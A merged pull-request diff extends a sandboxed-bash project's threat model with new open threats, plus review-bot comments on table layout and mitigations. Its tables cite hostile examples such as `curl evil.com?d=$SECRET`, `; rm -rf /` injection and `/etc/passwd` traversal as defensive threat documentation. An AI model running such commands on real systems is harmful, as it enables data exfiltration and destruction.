Merged
20 changes: 20 additions & 0 deletions crates/bashkit/docs/threat-model.md
Expand Up @@ -36,7 +36,13 @@ through configurable limits.
| Parser attack (TM-DOS-024) | Malformed input | `parser_timeout` | [`limits.rs`][limits] |
| Filesystem bomb (TM-DOS-007) | Zip bomb extraction | `FsLimits` | [`fs/limits.rs`][fslimits] |
| Many files (TM-DOS-006) | Create 1M files | `max_file_count` | [`fs/limits.rs`][fslimits] |
| TOCTOU append (TM-DOS-034) | Concurrent appends bypass limits | Single write lock | **OPEN** |
| OverlayFs limit gaps (TM-DOS-035-038) | CoW/whiteout/accounting bugs | Combined limit accounting | **OPEN** |
| Missing validate_path (TM-DOS-039) | VFS methods skip path checks | Add to all methods | **OPEN** |
| Diff algorithm DoS (TM-DOS-028) | `diff` on large unrelated files | LCS matrix cap (10M cells) | [`builtins/diff.rs`][diff] |
| Arithmetic overflow (TM-DOS-029) | `$(( 2 ** -1 ))` | Use wrapping arithmetic | **OPEN** |
| Parser limit bypass (TM-DOS-030) | eval/source ignore limits | Use `Parser::with_limits()` | **OPEN** |
| ExtGlob blowup (TM-DOS-031) | `+(a\|aa)` exponential | Add depth limit | **OPEN** |

**Configuration:**
```rust,ignore
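Review bot: the fourth column of this table is a source location (every existing row links a file, e.g. [`limits.rs`][limits]), so writing **OPEN** there for TM-DOS-034 through TM-DOS-039 and TM-DOS-029 to TM-DOS-031 conflates status with location; the git table later in this file has a separate status column with MITIGATED / PLANNED, and a matching Status column here would keep the two consistent. Also, `$(( 2 ** -1 ))` in the TM-DOS-029 row is a negative exponent, which is a different failure from integer overflow; consider an overflow example alongside it, and note that wrapping arithmetic silences overflow rather than reporting it, so a checked variant that returns an error may fit a DoS section better. Finally, TM-DOS-035-038 folds four threat IDs into one row with the generic mitigation "Combined limit accounting"; one row per ID, or at least naming which of CoW, whiteout and accounting each ID covers, would make these OPEN items actionable.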
Expand Down Expand Up @@ -74,6 +80,8 @@ Scripts may attempt to break out of the sandbox to access the host system.
| Shell escape (TM-ESC-005) | `exec /bin/bash` | Not implemented | Returns exit 127 |
| External commands (TM-ESC-006) | `./malicious` | No external exec | Returns exit 127 |
| eval injection (TM-ESC-008) | `eval "$input"` | Sandboxed eval | Only runs builtins |
| VFS limit bypass (TM-ESC-012) | `add_file()` skips limits | Restrict API visibility | **OPEN** |
| Custom builtins lost (TM-ESC-014) | `std::mem::take` empties builtins | Clone/Arc builtins | **OPEN** |

**Virtual Filesystem:**

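Review bot: "Restrict API visibility" for TM-ESC-012 does not close the gap by itself, since a less visible `add_file()` still skips the limits for whoever can call it; the mitigation should state that `add_file()` is routed through the same `FsLimits` accounting as script-side writes, with narrowing visibility as a secondary measure. The same status-versus-behaviour mismatch applies here: the existing rows put a behaviour in the last column ("Returns exit 127", "Only runs builtins") while the two new rows put **OPEN** there.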
Expand Down Expand Up @@ -102,6 +110,9 @@ Scripts may attempt to leak sensitive information.
| Env var leak (TM-INF-001) | `echo $SECRET` | Caller responsibility | See below |
| Host info (TM-INF-005) | `hostname` | Returns virtual value | [`builtins/system.rs`][system] |
| Network exfil (TM-INF-010) | `curl evil.com?d=$SECRET` | Network allowlist | [`network/allowlist.rs`][allowlist] |
| Host env via jq (TM-INF-013) | jq `env` exposes host env | Custom env impl | **OPEN** |
| Real PID leak (TM-INF-014) | `$$` returns real PID | Return virtual value | **OPEN** |
| Error msg info leak (TM-INF-016) | Errors expose host paths/IPs | Sanitize error messages | **OPEN** |

**Caller Responsibility (TM-INF-001):**

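Review bot: the mitigation for TM-INF-013 ("Custom env impl") should state that jq's `env` is backed by the same virtual environment the shell exposes, otherwise the caller-responsibility model for TM-INF-001 (the caller decides which `$SECRET` values the script can see) is bypassed by a second view of the host environment. For TM-INF-016, "Sanitize error messages" is underspecified: say what is stripped (the row lists host paths and IPs) and whether the unsanitized error remains available to the embedding caller for debugging, since silent stripping can hide the cause from the operator as well.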
Expand Down Expand Up @@ -196,6 +207,9 @@ exfiltration by encoding secrets in subdomains (`curl https://$SECRET.example.co
| Command injection (TM-INJ-001) | `$input` containing `; rm -rf /` | Variables expand to strings only |
| Path injection (TM-INJ-005) | `../../../../etc/passwd` | Path normalization |
| Terminal escapes (TM-INJ-008) | ANSI sequences in output | Caller should sanitize |
| Internal var injection (TM-INJ-009) | Set `_READONLY_X=""` | Isolate internal namespace | **OPEN** |
| Tar path traversal (TM-INJ-010) | `tar -xf` with `../` entries | Validate extract paths | **OPEN** |
| Cyclic nameref (TM-INJ-011) | Cyclic refs resolve silently | Detect cycle, error | **OPEN** |

**Variable Expansion:**

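Review bot: the three new rows have four cells while the existing rows (and so the header) have three, so the trailing **OPEN** cell will be silently dropped when the table is rendered; either add a Status column to the header and separator row or fold the status into the mitigation cell. For TM-INJ-010, state whether the path normalization credited to TM-INJ-005 in the row above already bounds `tar -xf` entries containing `../`: if extraction writes through the normalized VFS API the row is mitigated rather than open, and if it bypasses that API the bypass is the actual finding to record.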
Expand Down Expand Up @@ -331,6 +345,11 @@ Python `pathlib.Path` operations are bridged to Bashkit's virtual filesystem.
| Path traversal (TM-PY-017) | `../../etc/passwd` | VFS path normalization |
| Network access (TM-PY-020) | Socket/HTTP | Monty has no socket/network module |
| VM crash (TM-PY-022) | Malformed input | Parser depth limit + resource limits |
| Shell injection (TM-PY-023) | deepagents.py f-strings | Use shlex.quote() | **OPEN** |
| Heredoc escape (TM-PY-024) | Content contains delimiter | Random delimiter | **OPEN** |
| GIL deadlock (TM-PY-025) | execute_sync holds GIL | py.allow_threads() | **OPEN** |
| Config lost on reset (TM-PY-026) | reset() drops limits | Preserve config | **OPEN** |
| JSON recursion (TM-PY-027) | Nested dicts overflow stack | Add depth limit | **OPEN** |

**Architecture:**

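Review bot: same column mismatch as the injection table: the five added rows carry a fourth **OPEN** cell that the three-column table will not render. On substance, TM-PY-023 and TM-PY-024 share a root cause (untrusted content spliced into generated shell text), and `shlex.quote()` only protects a value passed as a single argument; for the heredoc case a random delimiter should be paired with a check that the content does not contain it, or the content should be handed over via the VFS or a variable instead of interpolation. The TM-PY-026 row ("reset() drops limits") also deserves a cross-reference from the limits section, since a caller that configures limits and then calls reset() silently loses the DoS protections listed earlier in this file.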
Expand All @@ -356,6 +375,7 @@ to the virtual filesystem.
| Many git objects (TM-GIT-007) | Millions of objects | `max_file_count` FS limit | MITIGATED |
| Deep history (TM-GIT-008) | Very long commit log | Log limit parameter | MITIGATED |
| Large pack files (TM-GIT-009) | Huge .git/objects/pack | `max_file_size` FS limit | MITIGATED |
| Branch name injection (TM-GIT-014) | `git branch ../../config` | Validate branch names | **OPEN** |
| Unauthorized clone (TM-GIT-001) | `git clone evil.com` | Remote URL allowlist | PLANNED (Phase 2) |
| Push to unauthorized (TM-GIT-010) | `git push evil.com` | Remote URL allowlist | PLANNED (Phase 2) |

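Review bot: the status vocabulary differs within this one table: the new TM-GIT-014 row uses bold **OPEN** while the surrounding rows use plain MITIGATED and PLANNED (Phase 2); pick one form. "Validate branch names" should also name the rule, and git's own ref rules (as enforced by `git check-ref-format`, which rejects `..` components among others) are the natural reference; the row should further say whether VFS path normalization already keeps `git branch ../../config` inside `.git/refs`, which decides between OPEN and MITIGATED.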